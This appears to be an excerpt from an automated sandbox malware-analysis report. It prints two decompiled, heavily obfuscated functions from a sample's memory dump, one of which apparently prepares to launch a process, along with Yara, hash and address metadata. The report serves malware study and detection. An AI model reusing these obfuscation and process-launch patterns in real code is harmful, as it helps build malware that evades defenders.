                                                      • String ID: "t$2!$2U$?s$IB$ei$om$,$2$P$R)$z
                                                      • API String ID: 0-3377435326
                                                      • Opcode ID: 3d0207934d40abbc6c7b225edab598dbb3739286f739d077276c6eaf293611b6
                                                      • Instruction ID: fb58a9e04fa6574d5e5616dac5a90d4baf9d6f3e43beb76c1edab8c68f0e0aa3
                                                      • Opcode Fuzzy Hash: 3d0207934d40abbc6c7b225edab598dbb3739286f739d077276c6eaf293611b6
                                                      • Instruction Fuzzy Hash: 7BB123725187809FE368CF25C88A90BFBF1BBC4358F508A1CF695862A0C7B9C559CF42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00236D9F, Relevance: 14.1, Strings: 11, Instructions: 340COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E00236D9F() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				char _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				signed int _v1212;
				signed int _v1216;
				void* _t365;
				void* _t366;
				intOrPtr _t368;
				signed int _t376;
				intOrPtr* _t378;
				void* _t379;
				signed int _t384;
				intOrPtr _t385;
				intOrPtr* _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				void* _t392;
				void* _t399;
				void* _t405;
				intOrPtr _t419;
				void* _t427;
				signed int* _t432;

				_t432 =  &_v1216;
				_v1048 = 0x446f36;
				_v1044 = 0;
				_v1168 = 0x4c2;
				_v1168 = _v1168 + 0x4422;
				_v1168 = _v1168 << 0xe;
				_v1168 = _v1168 ^ 0x12390029;
				_v1108 = 0xe6e3;
				_v1108 = _v1108 << 7;
				_v1108 = _v1108 ^ 0x80737181;
				_v1140 = 0x5a14;
				_v1140 = _v1140 + 0xffff6ad9;
				_v1140 = _v1140 + 0x3f04;
				_v1140 = _v1140 ^ 0x000003f3;
				_v1152 = 0xde22;
				_v1056 = 0;
				_t427 = 0x1cf5a099;
				_t387 = 0xc;
				_v1152 = _v1152 / _t387;
				_v1152 = _v1152 + 0x1888;
				_v1152 = _v1152 ^ 0x00005d3c;
				_v1072 = 0x75ae;
				_t388 = 0x55;
				_v1072 = _v1072 * 0x39;
				_v1072 = _v1072 ^ 0x001a1469;
				_v1160 = 0x6360;
				_v1160 = _v1160 << 0xa;
				_v1160 = _v1160 >> 0xe;
				_v1160 = _v1160 ^ 0x00005ec5;
				_v1204 = 0x5583;
				_v1204 = _v1204 ^ 0x85366cb5;
				_v1204 = _v1204 | 0x8d22480f;
				_v1204 = _v1204 + 0xffffa345;
				_v1204 = _v1204 ^ 0x8d362c42;
				_v1076 = 0x4501;
				_v1076 = _v1076 ^ 0x7eb858e4;
				_v1076 = _v1076 ^ 0x7eb84390;
				_v1176 = 0x178a;
				_v1176 = _v1176 >> 0xe;
				_v1176 = _v1176 * 0xb;
				_v1176 = _v1176 ^ 0x00005407;
				_v1196 = 0x1155;
				_v1196 = _v1196 << 0x10;
				_v1196 = _v1196 ^ 0x99db21f3;
				_v1196 = _v1196 << 8;
				_v1196 = _v1196 ^ 0x8e21cf72;
				_v1096 = 0x9447;
				_v1096 = _v1096 + 0xfffff759;
				_v1096 = _v1096 ^ 0x0000f307;
				_v1136 = 0x5f84;
				_v1136 = _v1136 | 0xcddc780f;
				_v1136 = _v1136 >> 5;
				_v1136 = _v1136 ^ 0x066ef8af;
				_v1104 = 0x8d89;
				_v1104 = _v1104 + 0xffff49e8;
				_v1104 = _v1104 ^ 0xffff9178;
				_v1060 = 0xefb9;
				_v1060 = _v1060 + 0xc1e0;
				_v1060 = _v1060 ^ 0x0001802f;
				_v1088 = 0x4e92;
				_v1088 = _v1088 / _t388;
				_v1088 = _v1088 ^ 0x00003d65;
				_v1180 = 0x8957;
				_v1180 = _v1180 ^ 0x92844c79;
				_v1180 = _v1180 >> 0xd;
				_v1180 = _v1180 + 0x6937;
				_v1180 = _v1180 ^ 0x0004ca08;
				_v1188 = 0xa977;
				_v1188 = _v1188 + 0xffff4939;
				_t389 = 0x2a;
				_v1188 = _v1188 / _t389;
				_v1188 = _v1188 + 0xff8b;
				_v1188 = _v1188 ^ 0x06195dc5;
				_v1184 = 0xd80a;
				_v1184 = _v1184 << 0xd;
				_v1184 = _v1184 | 0x4fc46678;
				_v1184 = _v1184 + 0xffff2565;
				_v1184 = _v1184 ^ 0x5fc4ec42;
				_v1144 = 0xea63;
				_v1144 = _v1144 >> 0xa;
				_v1144 = _v1144 + 0xffff7a6a;
				_v1144 = _v1144 ^ 0xffff3b56;
				_v1064 = 0xbe27;
				_v1064 = _v1064 << 0xc;
				_v1064 = _v1064 ^ 0x0be2654a;
				_v1100 = 0x1945;
				_v1100 = _v1100 ^ 0xac55a11c;
				_v1100 = _v1100 ^ 0xac55a0be;
				_v1156 = 0x9792;
				_v1156 = _v1156 << 3;
				_v1156 = _v1156 + 0xffff9949;
				_v1156 = _v1156 ^ 0x00042150;
				_v1124 = 0x4510;
				_v1124 = _v1124 + 0xffff8613;
				_v1124 = _v1124 | 0x934ed599;
				_v1124 = _v1124 ^ 0xffffb057;
				_v1208 = 0xd7d3;
				_t390 = 0x4a;
				_v1208 = _v1208 * 0x29;
				_v1208 = _v1208 << 7;
				_v1208 = _v1208 | 0x9b57b5c9;
				_v1208 = _v1208 ^ 0x9b5f9b7a;
				_v1164 = 0x3cc8;
				_v1164 = _v1164 + 0xffff7a64;
				_v1164 = _v1164 + 0xffff31bf;
				_v1164 = _v1164 ^ 0xfffea90e;
				_v1092 = 0xe652;
				_v1092 = _v1092 << 0xf;
				_v1092 = _v1092 ^ 0x732967ec;
				_v1200 = 0xc0e1;
				_v1200 = _v1200 ^ 0xc04a3a1a;
				_v1200 = _v1200 | 0x7efbebea;
				_v1200 = _v1200 ^ 0xfefb9216;
				_v1192 = 0x2d8c;
				_v1192 = _v1192 >> 7;
				_v1192 = _v1192 ^ 0x302961fe;
				_v1192 = _v1192 << 0xf;
				_v1192 = _v1192 ^ 0xb0d2939c;
				_v1132 = 0xbcbe;
				_v1132 = _v1132 | 0x9a03aa26;
				_v1132 = _v1132 << 4;
				_v1132 = _v1132 ^ 0xa03bfed3;
				_v1068 = 0x5b9d;
				_v1068 = _v1068 / _t390;
				_v1068 = _v1068 ^ 0x00000144;
				_v1172 = 0x2743;
				_v1172 = _v1172 >> 9;
				_v1172 = _v1172 + 0x7fd0;
				_v1172 = _v1172 ^ 0x00002a87;
				_v1116 = 0x6969;
				_t391 = 0x76;
				_v1116 = _v1116 / _t391;
				_v1116 = _v1116 << 0xa;
				_v1116 = _v1116 ^ 0x0003c98c;
				_v1212 = 0xb804;
				_v1212 = _v1212 + 0xffff4ff5;
				_v1212 = _v1212 << 0xd;
				_v1212 = _v1212 + 0x7e88;
				_v1212 = _v1212 ^ 0x00ffdfa3;
				_v1084 = 0x6753;
				_v1084 = _v1084 | 0x97d0336a;
				_v1084 = _v1084 ^ 0x97d00d97;
				_v1148 = 0xef82;
				_v1148 = _v1148 >> 2;
				_v1148 = _v1148 << 2;
				_v1148 = _v1148 ^ 0x0000cb2e;
				_v1112 = 0x5852;
				_v1112 = _v1112 >> 7;
				_v1112 = _v1112 ^ 0xfa80e3bf;
				_v1112 = _v1112 ^ 0xfa8084b8;
				_v1120 = 0x62fa;
				_v1120 = _v1120 >> 0xa;
				_v1120 = _v1120 << 3;
				_v1120 = _v1120 ^ 0x000065d7;
				_t384 = _v1056;
				_v1128 = 0x8139;
				_v1128 = _v1128 + 0xffff21ec;
				_v1128 = _v1128 ^ 0xad93553f;
				_v1128 = _v1128 ^ 0x526c8c2f;
				_v1080 = 0x16f9;
				_v1080 = _v1080 + 0xffffafc8;
				_v1080 = _v1080 ^ 0xffff87da;
				_v1216 = 0xd107;
				_v1216 = _v1216 << 0xa;
				_v1216 = _v1216 >> 0xb;
				_v1216 = _v1216 | 0x40b78e0e;
				_v1216 = _v1216 ^ 0x40b7ee8e;
				while(1) {
					L1:
					_t392 = 0x5c;
					while(1) {
						L2:
						_t365 = 0x201e73d8;
						do {
							L3:
							if(_t427 == 0xb9056ba) {
								_push(_v1176);
								_t366 = E0024889D(0x24c930, _v1076, __eflags);
								_t368 =  *0x24ca2c; // 0x698300
								__eflags = _t368 + 0x230;
								_t419 =  *0x24ca2c; // 0x698300
								E002329E3(_t419, 0x104, _t366, _v1196, _v1096, _v1136, _t368 + 0x230,  &_v1040, _v1104, _v1060);
								E00242025(_v1088, _t366, _v1180, _v1188);
								_t432 =  &(_t432[0xc]);
								_t427 = 0x176c6394;
								goto L17;
							} else {
								if(_t427 == 0x176c6394) {
									_t385 =  *0x24ca2c; // 0x698300
									_t386 = _t385 + 0x230;
									while(1) {
										__eflags =  *_t386 - _t392;
										if(__eflags == 0) {
											break;
										}
										_t386 = _t386 + 2;
										__eflags = _t386;
									}
									_t384 = _t386 + 2;
									_t427 = 0x2c3250cc;
									goto L2;
								} else {
									if(_t427 == 0x1cf5a099) {
										_push(_t392);
										_push(_t392);
										E0023C6C7(_v1152, _v1072,  &_v520, _t392, _v1160, _v1168, _v1204);
										_t432 =  &(_t432[7]);
										_t427 = 0xb9056ba;
										goto L1;
									} else {
										if(_t427 == 0x1e86e44b) {
											E002365A2(_v1052, _v1112, _v1120, _v1128, _v1080);
										} else {
											if(_t427 == _t365) {
												_t376 = E00240ADC( &_v1040, _v1132, _v1068);
												_pop(_t399);
												_t378 = E00231AC6(_v1172, _v1116, 2 + _t376 * 2, _v1052,  &_v1040, _t399, _v1212, _v1084, _v1148, _t384, _v1216);
												_t432 =  &(_t432[9]);
												__eflags = _t378;
												_t427 = 0x1e86e44b;
												_v1056 = 0 | __eflags == 0x00000000;
												while(1) {
													L1:
													_t392 = 0x5c;
													L2:
													_t365 = 0x201e73d8;
													goto L3;
												}
											} else {
												_t440 = _t427 - 0x2c3250cc;
												if(_t427 == 0x2c3250cc) {
													_push(_v1144);
													_t379 = E0024889D(0x24c9d0, _v1184, _t440);
													_pop(_t405);
													E00243EB3(_v1064, _t405, _t379, _v1100, _v1156, 0x24c9d0, _v1124, _v1208, 0x24c9d0, _v1164, 0x24c9d0, _v1140, _v1108,  &_v1052);
													_t427 =  ==  ? 0x201e73d8 : 0x22b0460c;
													E00242025(_v1092, _t379, _v1200, _v1192);
													_t432 =  &(_t432[0xf]);
													L17:
													_t365 = 0x201e73d8;
													_t392 = 0x5c;
												}
												goto L18;
											}
										}
									}
								}
							}
							L21:
							return _v1056;
							L18:
						} while (_t427 != 0x22b0460c);
						goto L21;
					}
				}
			}





































































                                                      0x00236d9f
                                                      0x00236da5
                                                      0x00236db2
                                                      0x00236dbb
                                                      0x00236dc3
                                                      0x00236dcb
                                                      0x00236dd0
                                                      0x00236dd8
                                                      0x00236de0
                                                      0x00236de5
                                                      0x00236ded
                                                      0x00236df5
                                                      0x00236dfd
                                                      0x00236e05
                                                      0x00236e0d
                                                      0x00236e19
                                                      0x00236e20
                                                      0x00236e2b
                                                      0x00236e30
                                                      0x00236e36
                                                      0x00236e3e
                                                      0x00236e46
                                                      0x00236e59
                                                      0x00236e5a
                                                      0x00236e61
                                                      0x00236e6c
                                                      0x00236e74
                                                      0x00236e79
                                                      0x00236e7e
                                                      0x00236e86
                                                      0x00236e8e
                                                      0x00236e96
                                                      0x00236e9e
                                                      0x00236ea6
                                                      0x00236eae
                                                      0x00236eb9
                                                      0x00236ec4
                                                      0x00236ecf
                                                      0x00236ed7
                                                      0x00236ee1
                                                      0x00236ee5
                                                      0x00236eed
                                                      0x00236ef5
                                                      0x00236efa
                                                      0x00236f02
                                                      0x00236f07
                                                      0x00236f0f
                                                      0x00236f1a
                                                      0x00236f25
                                                      0x00236f30
                                                      0x00236f38
                                                      0x00236f40
                                                      0x00236f45
                                                      0x00236f4d
                                                      0x00236f58
                                                      0x00236f63
                                                      0x00236f6e
                                                      0x00236f79
                                                      0x00236f84
                                                      0x00236f8f
                                                      0x00236fa3
                                                      0x00236faa
                                                      0x00236fb5
                                                      0x00236fbd
                                                      0x00236fc5
                                                      0x00236fca
                                                      0x00236fd2
                                                      0x00236fda
                                                      0x00236fe4
                                                      0x00236ff2
                                                      0x00236ff7
                                                      0x00236ffd
                                                      0x00237005
                                                      0x0023700d
                                                      0x00237015
                                                      0x0023701a
                                                      0x00237022
                                                      0x0023702a
                                                      0x00237032
                                                      0x0023703a
                                                      0x0023703f
                                                      0x00237047
                                                      0x0023704f
                                                      0x0023705a
                                                      0x00237062
                                                      0x0023706d
                                                      0x00237078
                                                      0x00237083
                                                      0x0023708e
                                                      0x00237096
                                                      0x0023709b
                                                      0x002370a3
                                                      0x002370ab
                                                      0x002370b3
                                                      0x002370bb
                                                      0x002370c3
                                                      0x002370cb
                                                      0x002370d8
                                                      0x002370db
                                                      0x002370df
                                                      0x002370e4
                                                      0x002370ec
                                                      0x002370f4
                                                      0x002370fc
                                                      0x00237104
                                                      0x0023710c
                                                      0x00237114
                                                      0x0023711f
                                                      0x00237127
                                                      0x00237132
                                                      0x0023713a
                                                      0x00237142
                                                      0x0023714a
                                                      0x00237152
                                                      0x0023715a
                                                      0x0023715f
                                                      0x00237167
                                                      0x0023716c
                                                      0x00237174
                                                      0x0023717c
                                                      0x00237184
                                                      0x00237189
                                                      0x00237191
                                                      0x002371a7
                                                      0x002371ae
                                                      0x002371b9
                                                      0x002371c1
                                                      0x002371c6
                                                      0x002371ce
                                                      0x002371d6
                                                      0x002371e2
                                                      0x002371e5
                                                      0x002371e9
                                                      0x002371ee
                                                      0x002371f6
                                                      0x002371fe
                                                      0x0023720b
                                                      0x00237210
                                                      0x00237218
                                                      0x00237220
                                                      0x0023722b
                                                      0x00237236
                                                      0x00237241
                                                      0x00237249
                                                      0x0023724e
                                                      0x00237253
                                                      0x0023725b
                                                      0x00237263
                                                      0x00237268
                                                      0x00237270
                                                      0x00237278
                                                      0x00237280
                                                      0x00237285
                                                      0x0023728a
                                                      0x00237292
                                                      0x00237299
                                                      0x002372a1
                                                      0x002372a9
                                                      0x002372b1
                                                      0x002372b9
                                                      0x002372c4
                                                      0x002372cf
                                                      0x002372da
                                                      0x002372e2
                                                      0x002372e7
                                                      0x002372ec
                                                      0x002372f4
                                                      0x002372fc
                                                      0x002372fc
                                                      0x002372fe
                                                      0x002372ff
                                                      0x002372ff
                                                      0x002372ff
                                                      0x00237304
                                                      0x00237304
                                                      0x0023730a
                                                      0x00237487
                                                      0x00237497
                                                      0x002374bb
                                                      0x002374c0
                                                      0x002374d5
                                                      0x002374e1
                                                      0x002374f7
                                                      0x002374fc
                                                      0x002374ff
                                                      0x00000000
                                                      0x00237310
                                                      0x00237316
                                                      0x00237467
                                                      0x0023746d
                                                      0x00237478
                                                      0x00237478
                                                      0x0023747b
                                                      0x00000000
                                                      0x00000000
                                                      0x00237475
                                                      0x00237475
                                                      0x00237475
                                                      0x0023747d
                                                      0x00237480
                                                      0x00000000
                                                      0x0023731c
                                                      0x00237322
                                                      0x00237433
                                                      0x00237434
                                                      0x00237455
                                                      0x0023745a
                                                      0x0023745d
                                                      0x00000000
                                                      0x00237328
                                                      0x0023732e
                                                      0x00237537
                                                      0x00237334
                                                      0x00237336
                                                      0x002373d6
                                                      0x002373db
                                                      0x00237413
                                                      0x0023741a
                                                      0x0023741d
                                                      0x0023741f
                                                      0x00237427
                                                      0x002372fc
                                                      0x002372fc
                                                      0x002372fe
                                                      0x002372ff
                                                      0x002372ff
                                                      0x00000000
                                                      0x002372ff
                                                      0x0023733c
                                                      0x0023733c
                                                      0x0023733e
                                                      0x00237344
                                                      0x00237351
                                                      0x00237356
                                                      0x00237392
                                                      0x002373b4
                                                      0x002373b7
                                                      0x002373bc
                                                      0x00237504
                                                      0x00237506
                                                      0x0023750b
                                                      0x0023750b
                                                      0x00000000
                                                      0x0023733e
                                                      0x00237336
                                                      0x0023732e
                                                      0x00237322
                                                      0x00237316
                                                      0x0023753f
                                                      0x00237550
                                                      0x0023750c
                                                      0x0023750c
                                                      0x00000000
                                                      0x00237518
                                                      0x002372ff

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FolderPath
                                                      • String ID: "D$)$6oD$7i$<]$C'$RX$Sg$`c$c$g)s
                                                      • API String ID: 1514166925-3192994148
                                                      • Opcode ID: 359d5774a81b166ce332722f6b2da11cc746ba0cb66d68a7f4fc9c412c1fa46b
                                                      • Instruction ID: fab8afe8c8a666489120921d993541215d9e2d5878b52d534482f681a22b0ddc
                                                      • Opcode Fuzzy Hash: 359d5774a81b166ce332722f6b2da11cc746ba0cb66d68a7f4fc9c412c1fa46b
                                                      • Instruction Fuzzy Hash: 880215B15197819FE3A5CF65C84AA4BBBE1FBC5748F10890CF2D9862A0D7B58919CF03
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0023BB3A, Relevance: 14.0, Strings: 11, Instructions: 273COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E0023BB3A(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a28) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				char _t284;
				signed int _t317;
				void* _t322;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				intOrPtr _t357;
				signed int* _t360;

				_push(_a28);
				_push(0);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				_t284 = E0023602B(0);
				_v72 = _t284;
				_t357 = _t284;
				_v176 = 0x3707;
				_t360 =  &(( &_v188)[9]);
				_v176 = _v176 << 3;
				_t322 = 0x3701c77e;
				_t349 = 0x1b;
				_v176 = _v176 * 0x3b;
				_v176 = _v176 ^ 0x9e3c13fc;
				_v176 = _v176 ^ 0x9e596314;
				_v152 = 0x78a7;
				_v152 = _v152 + 0x292e;
				_v152 = _v152 << 3;
				_v152 = _v152 ^ 0x00050e88;
				_v180 = 0xd511;
				_v180 = _v180 ^ 0x1d80f702;
				_v180 = _v180 << 0xe;
				_v180 = _v180 ^ 0xe181230f;
				_v180 = _v180 ^ 0xe905cae0;
				_v92 = 0xc43e;
				_v92 = _v92 + 0xffff1ae3;
				_v92 = _v92 ^ 0xffffb82c;
				_v104 = 0x4365;
				_v104 = _v104 >> 5;
				_v104 = _v104 >> 9;
				_v104 = _v104 ^ 0x000066ec;
				_v172 = 0xf4f1;
				_v172 = _v172 + 0x10b4;
				_v172 = _v172 + 0xffffc378;
				_v172 = _v172 / _t349;
				_v172 = _v172 ^ 0x000074e7;
				_v116 = 0x37b8;
				_v116 = _v116 + 0xffff57e4;
				_v116 = _v116 + 0xb626;
				_v116 = _v116 ^ 0x0000140c;
				_v144 = 0xb795;
				_t350 = 0x49;
				_v144 = _v144 * 0x50;
				_v144 = _v144 / _t350;
				_v144 = _v144 ^ 0x000091bc;
				_v76 = 0x1dd7;
				_t351 = 0x1c;
				_v76 = _v76 * 0x75;
				_v76 = _v76 ^ 0x000d9fef;
				_v108 = 0xced7;
				_v108 = _v108 >> 5;
				_v108 = _v108 / _t351;
				_v108 = _v108 ^ 0x00005a08;
				_v136 = 0x2b88;
				_v136 = _v136 ^ 0x78d809e4;
				_v136 = _v136 >> 0xe;
				_v136 = _v136 ^ 0x0001f73d;
				_v164 = 0x766d;
				_v164 = _v164 >> 1;
				_v164 = _v164 + 0xffffabb8;
				_t352 = 0x72;
				_v164 = _v164 * 0x5c;
				_v164 = _v164 ^ 0xfff6cd9c;
				_v168 = 0x718b;
				_v168 = _v168 ^ 0xcaa0facc;
				_v168 = _v168 ^ 0xed5841e4;
				_t112 =  &_v168; // 0xed5841e4
				_v168 =  *_t112 * 0x1f;
				_v168 = _v168 ^ 0xd720c943;
				_v100 = 0x3093;
				_v100 = _v100 << 8;
				_v100 = _v100 * 0x6e;
				_v100 = _v100 ^ 0x14df3334;
				_v80 = 0xaa77;
				_v80 = _v80 | 0xec49ccd9;
				_v80 = _v80 ^ 0xec49f00b;
				_v184 = 0x6ab1;
				_v184 = _v184 << 0x10;
				_v184 = _v184 + 0x7c9;
				_v184 = _v184 + 0xb8a8;
				_v184 = _v184 ^ 0x6ab1ec4b;
				_v96 = 0xf4af;
				_v96 = _v96 * 0x3a;
				_v96 = _v96 >> 9;
				_v96 = _v96 ^ 0x00007d4d;
				_v188 = 0xb63a;
				_v188 = _v188 ^ 0x365cf355;
				_v188 = _v188 << 2;
				_v188 = _v188 + 0xd6ce;
				_v188 = _v188 ^ 0xd971d569;
				_v120 = 0xab3a;
				_v120 = _v120 * 0x32;
				_v120 = _v120 / _t352;
				_v120 = _v120 ^ 0x00002a91;
				_v156 = 0xadc6;
				_v156 = _v156 >> 9;
				_v156 = _v156 + 0xffff5d43;
				_v156 = _v156 ^ 0xffff767e;
				_v128 = 0x4e26;
				_t353 = 0x54;
				_v128 = _v128 / _t353;
				_v128 = _v128 ^ 0xbd5b2ebf;
				_v128 = _v128 ^ 0xbd5b3d92;
				_v112 = 0x5bd4;
				_v112 = _v112 | 0xfffbefdf;
				_v112 = _v112 ^ 0xfffb9ace;
				_v88 = 0x9c25;
				_v88 = _v88 | 0xd782555b;
				_v88 = _v88 ^ 0xd782aa4a;
				_v140 = 0x1cfa;
				_v140 = _v140 >> 1;
				_t354 = 0x5d;
				_v140 = _v140 / _t354;
				_v140 = _v140 ^ 0x0000306c;
				_v148 = 0xedd7;
				_v148 = _v148 ^ 0xabf54283;
				_t355 = 0x30;
				_v148 = _v148 / _t355;
				_v148 = _v148 ^ 0x03952150;
				_v124 = 0xb354;
				_v124 = _v124 + 0xffffd7c7;
				_v124 = _v124 + 0x3a29;
				_v124 = _v124 ^ 0x0000d052;
				_v132 = 0x3532;
				_v132 = _v132 >> 0xb;
				_v132 = _v132 | 0xce8e7aaf;
				_v132 = _v132 ^ 0xce8e32c4;
				_v160 = 0x7409;
				_v160 = _v160 | 0x6d9a42b1;
				_v160 = _v160 + 0xffff6faf;
				_v160 = _v160 >> 2;
				_v160 = _v160 ^ 0x1b6641d5;
				_v84 = 0xb2d5;
				_v84 = _v84 * 0x47;
				_v84 = _v84 ^ 0x0031fe78;
				do {
					while(_t322 != 0x94ffda2) {
						if(_t322 == 0x11e75ef4) {
							_t317 = E00232833(_v180,  &_v72, _v92, _a8, _v104, _v172);
							_t360 =  &(_t360[5]);
							__eflags = _t317;
							if(_t317 != 0) {
								_t322 = 0x94ffda2;
								continue;
							}
						} else {
							if(_t322 == 0x3336903c) {
								E0024337D(_v124, _v72, _v132, _v160, _v84);
							} else {
								if(_t322 != 0x3701c77e) {
									goto L9;
								} else {
									_t322 = 0x11e75ef4;
									continue;
								}
							}
						}
						L12:
						return _t357;
					}
					E002493A8(_v116, _v144, _v76,  &_v68, 0x44, _v108);
					_push(_v164);
					_v68 = 0x44;
					_v60 = E0024889D(0x24c000, _v136, __eflags);
					__eflags = _v152 | _v176;
					_t357 = E00237AB1(_v168, _a16, 0x24c000, 0x24c000, _v152 | _v176, _v100, 0x24c000, 0x24c000, _v80, _v184, _v96, _a28, 0, _a8, _v188, _v120, _v72, _v156, _v128, _v112,  &_v68);
					E00242025(_v88, _v60, _v140, _v148);
					_t360 =  &(_t360[0x1a]);
					_t322 = 0x3336903c;
					L9:
					__eflags = _t322 - 0x294b0e13;
				} while (_t322 != 0x294b0e13);
				goto L12;
			}















































                                                      0x0023bb44
                                                      0x0023bb4d
                                                      0x0023bb4e
                                                      0x0023bb55
                                                      0x0023bb5c
                                                      0x0023bb63
                                                      0x0023bb6a
                                                      0x0023bb6b
                                                      0x0023bb6c
                                                      0x0023bb6d
                                                      0x0023bb72
                                                      0x0023bb79
                                                      0x0023bb7b
                                                      0x0023bb83
                                                      0x0023bb86
                                                      0x0023bb92
                                                      0x0023bb99
                                                      0x0023bb9c
                                                      0x0023bba0
                                                      0x0023bba8
                                                      0x0023bbb0
                                                      0x0023bbb8
                                                      0x0023bbc0
                                                      0x0023bbc5
                                                      0x0023bbcd
                                                      0x0023bbd5
                                                      0x0023bbdd
                                                      0x0023bbe2
                                                      0x0023bbea
                                                      0x0023bbf2
                                                      0x0023bbfa
                                                      0x0023bc02
                                                      0x0023bc0a
                                                      0x0023bc12
                                                      0x0023bc17
                                                      0x0023bc1c
                                                      0x0023bc24
                                                      0x0023bc2c
                                                      0x0023bc34
                                                      0x0023bc44
                                                      0x0023bc48
                                                      0x0023bc50
                                                      0x0023bc58
                                                      0x0023bc60
                                                      0x0023bc68
                                                      0x0023bc70
                                                      0x0023bc7d
                                                      0x0023bc80
                                                      0x0023bc8c
                                                      0x0023bc90
                                                      0x0023bc98
                                                      0x0023bcab
                                                      0x0023bcac
                                                      0x0023bcb3
                                                      0x0023bcbe
                                                      0x0023bcc6
                                                      0x0023bcd1
                                                      0x0023bcd5
                                                      0x0023bcdd
                                                      0x0023bce5
                                                      0x0023bced
                                                      0x0023bcf2
                                                      0x0023bcfc
                                                      0x0023bd04
                                                      0x0023bd08
                                                      0x0023bd17
                                                      0x0023bd1a
                                                      0x0023bd1e
                                                      0x0023bd26
                                                      0x0023bd2e
                                                      0x0023bd36
                                                      0x0023bd3e
                                                      0x0023bd43
                                                      0x0023bd47
                                                      0x0023bd4f
                                                      0x0023bd57
                                                      0x0023bd61
                                                      0x0023bd65
                                                      0x0023bd6d
                                                      0x0023bd78
                                                      0x0023bd83
                                                      0x0023bd8e
                                                      0x0023bd96
                                                      0x0023bd9b
                                                      0x0023bda3
                                                      0x0023bdab
                                                      0x0023bdb3
                                                      0x0023bdc0
                                                      0x0023bdc4
                                                      0x0023bdc9
                                                      0x0023bdd1
                                                      0x0023bdd9
                                                      0x0023bde1
                                                      0x0023bde6
                                                      0x0023bdee
                                                      0x0023bdf6
                                                      0x0023be03
                                                      0x0023be0f
                                                      0x0023be13
                                                      0x0023be1b
                                                      0x0023be23
                                                      0x0023be28
                                                      0x0023be30
                                                      0x0023be38
                                                      0x0023be44
                                                      0x0023be49
                                                      0x0023be4f
                                                      0x0023be57
                                                      0x0023be5f
                                                      0x0023be67
                                                      0x0023be6f
                                                      0x0023be77
                                                      0x0023be7f
                                                      0x0023be87
                                                      0x0023be8f
                                                      0x0023be97
                                                      0x0023be9f
                                                      0x0023bea4
                                                      0x0023beaa
                                                      0x0023beb2
                                                      0x0023beba
                                                      0x0023bec6
                                                      0x0023bec9
                                                      0x0023bed2
                                                      0x0023bedf
                                                      0x0023beec
                                                      0x0023bef4
                                                      0x0023befc
                                                      0x0023bf04
                                                      0x0023bf0c
                                                      0x0023bf11
                                                      0x0023bf19
                                                      0x0023bf21
                                                      0x0023bf29
                                                      0x0023bf31
                                                      0x0023bf39
                                                      0x0023bf3e
                                                      0x0023bf46
                                                      0x0023bf53
                                                      0x0023bf57
                                                      0x0023bf5f
                                                      0x0023bf5f
                                                      0x0023bf65
                                                      0x0023bf9e
                                                      0x0023bfa3
                                                      0x0023bfa6
                                                      0x0023bfa8
                                                      0x0023bfae
                                                      0x00000000
                                                      0x0023bfae
                                                      0x0023bf67
                                                      0x0023bf69
                                                      0x0023c0b1
                                                      0x0023bf6f
                                                      0x0023bf75
                                                      0x00000000
                                                      0x0023bf7b
                                                      0x0023bf7b
                                                      0x00000000
                                                      0x0023bf7b
                                                      0x0023bf75
                                                      0x0023bf69
                                                      0x0023c0ba
                                                      0x0023c0c5
                                                      0x0023c0c5
                                                      0x0023bfcf
                                                      0x0023bfd4
                                                      0x0023bfe1
                                                      0x0023bff4
                                                      0x0023c054
                                                      0x0023c06b
                                                      0x0023c082
                                                      0x0023c087
                                                      0x0023c08a
                                                      0x0023c08c
                                                      0x0023c08c
                                                      0x0023c08c
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
